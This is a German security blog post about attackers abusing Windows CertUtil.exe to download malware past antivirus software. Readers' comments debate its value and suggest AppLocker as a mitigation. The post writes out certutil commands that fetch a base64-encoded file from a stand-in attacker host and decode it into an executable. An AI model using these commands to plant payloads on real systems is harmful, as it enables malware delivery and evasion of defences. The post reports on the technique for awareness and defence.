Windows CertUtil.exe ermöglicht Malware einzuschleusen

Publiziert am 5. April 2018 von Günter Born

Mit Windows wird das Tool CertUtil.exe zur Verwaltung von Zertifikaten mitgeliefert. Dieses Tool lässt sich u. U. missbrauchen, um Malware an den Antivirus-Systemen vorbei auf ein System zu schleusen.

Anzeige

Mit CertUtil.exe können Sie verschiedene Funktionen im Zusammenhang mit Zertifikaten und Zertifikatsspeichern ausführen. Zum Beispiel ist es in Windows möglich, Zertifikate zu installieren, zu sichern, zu löschen, zu verwalten und auszuführen.

Download per CertUtil

Eine der Funktionen von CertUtil bietet die Möglichkeit, ein Zertifikat oder eine andere Datei von einer entfernten URL herunterzuladen und als lokale Datei mit der Syntax

certutil.exe -urlcache -split -f [URL] output.file

zu speichern. Bereits 2017 meldete der Sicherheitsforscher Casey Smith seine Bedenken, dass diese Methode zum Herunterladen von Malware verwendet werden könnte, an.

Diese Bedenken waren berechtigt, inzwischen verwenden Angreifer CertUtil, um Malware herunterzuladen, wie dieses Beispiel aus dem Jahr 2016 und ein neuer Trojaner vom März 2018 zeigen. verwendet es auch, um verschiedene Batch-Dateien und Skripte auf einen infizierten Computer herunterzuladen.

Trojaner-Code
(Trojaner-Code, zum Vergrößern klicken)

Manche Computer sind zwar so konfiguriert, dass unbekannte Anwendungen nicht ausgeführt werden können. Über den Ansatz Batch- oder Script-Programme und CertUtil.exe lässt sich diese Sperre zum Download von Programmen aber oft umgehen.

Anzeige

Antivirus-Lösungen ausgetrickst

Der Sicherheitskonsultant Xavier Mertens veröffentlichte einen Ansatz, der es Malware unter Verwendung von CertUtil einfacher macht, unentdeckt zu bleiben. Wie Bleeping Computer hier schreibt, wird die Datei mit der Malware zunächst als harmloser Text kodiert und nach dem Download mit CertUtil.exe über folgenden Befehl dekodiert.

certutil.exe -urlcache -split -f [URL] output.file

In dieser Form könnte eine Antivirus-Software die Malware noch erkennen. Dies lässt sich umgehen, indem die bösartige Datei zunächst mit base64 kodieren wird. Dann erscheint sie für den AV-Scanner als harmloser Text. Die heruntergeladene und Base64-kodierte Textdatei lässt sich mit dem Befehl certutil.exe –decode in eine ausführbare Datei in dekodieren. Xavier Mertens hat folgendes Beispiel veröffentlicht:

C:\Temp>certutil.exe -urlcache -split -f "https: // hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

Das Team von MalwareHunter teilte Bleeping Computer mit, dass dieser Ansatz bereits genutzt werde.

Auch Kaspersky-Sicherheitsforscher Fabio Assolini weist in obigem Tweet darauf hin, dass diese Methode bereits seit einiger Zeit von brasilianischen Programmierern verwendet wird.

Ähnliche Artikel:
Ausgepatcht: Keine Microcode-Updates für ältere Intel-CPUs
Kritisches Update für MS Malware Protection Engine (CVE-2018-0986)
Erebus Ransomware und die ausgetrickste UAC
Windows10: Neue UAC-Bypassing-Methode (fodhelper.exe)
Windows: Sicherheitslücke über LNK-Codeausführung
OEM-Bloatware (PdiService.exe) als Sicherheitsrisiko auf Notebooks

Cookies blockieren entzieht uns die Finanzierung: Cookie-Einstellungen
Dieser Beitrag wurde unter Sicherheit, Windows abgelegt und mit , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

7 Antworten zu Windows CertUtil.exe ermöglicht Malware einzuschleusen

  1. crispp sagt:
    5. April 2018 um 08:35 Uhr

    Hmm, spätestens beim Starten der EXE-Datei sollte der Virenscanner zumindest bei bekannter Malware zuschlagen. Was bringt somit der Download am Virenscanner vorbei?

    Antworten
    • Günter Born sagt:
      5. April 2018 um 09:52 Uhr

      Nach meinem Verständnis die Kombination aus Text mit Encodierung

      Antworten
      • crispp sagt:
        5. April 2018 um 10:27 Uhr

        Du hast meine Frage falsch interpretiert. Es ging nicht darum, wie es technisch funktioniert sondern darum, was ich davon habe, dass ich den Virenscanner auf diesem Weg umgangen habe.

        Antworten
      • Alfred E. Neumann sagt:
        6. April 2018 um 19:49 Uhr

        AUTSCH!
        Spätestens beim Schreiben einer (bekannt schädlichen) *.EXE wird jeder AV-Scanner getriggert.
        Der Umweg über eine (base64-kodierte) Textdatei ist damit sinnlos.
        Es soll sogar AV-Scanner geben, die Base64 dekodieren können.

        Antworten
    • Blupp sagt:
      5. April 2018 um 09:56 Uhr

      Was ist mit noch unbekannter Malware? Die Heuristik läuft dann eventuell erst garnicht an. Manch Vierenscanner vertraut Prozessen die von vertrauenswürdigen Anwendungen erstellt wurden, da könnte u.U. selbst bekannte Malware durchschlüpfen. Wenn Maleare es erstmal zur Ausführung geschafft hat ist es vorbei, das System ist nicht mehr vertrauenswürdig.
      Vierenscanner können hilfreich sein bzw. sind, wenn man sie als ein Werkzeug versteht, durchaus sinnvoll einsetztbar. Die von der Industrie suggerierte Sicherheit liefern die aber nicht.

      Antworten
  2. Alfred sagt:
    5. April 2018 um 21:21 Uhr

    Wie kann man das mildern?

    Antworten
    • Alfred E. Neumann sagt:
      6. April 2018 um 19:51 Uhr

      "write XOR execute" alias "data execution prevention" im Dateisystem per SAFER alias Softwarebeschränkungsrichtlinien oder AppLocker!

      Antworten

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.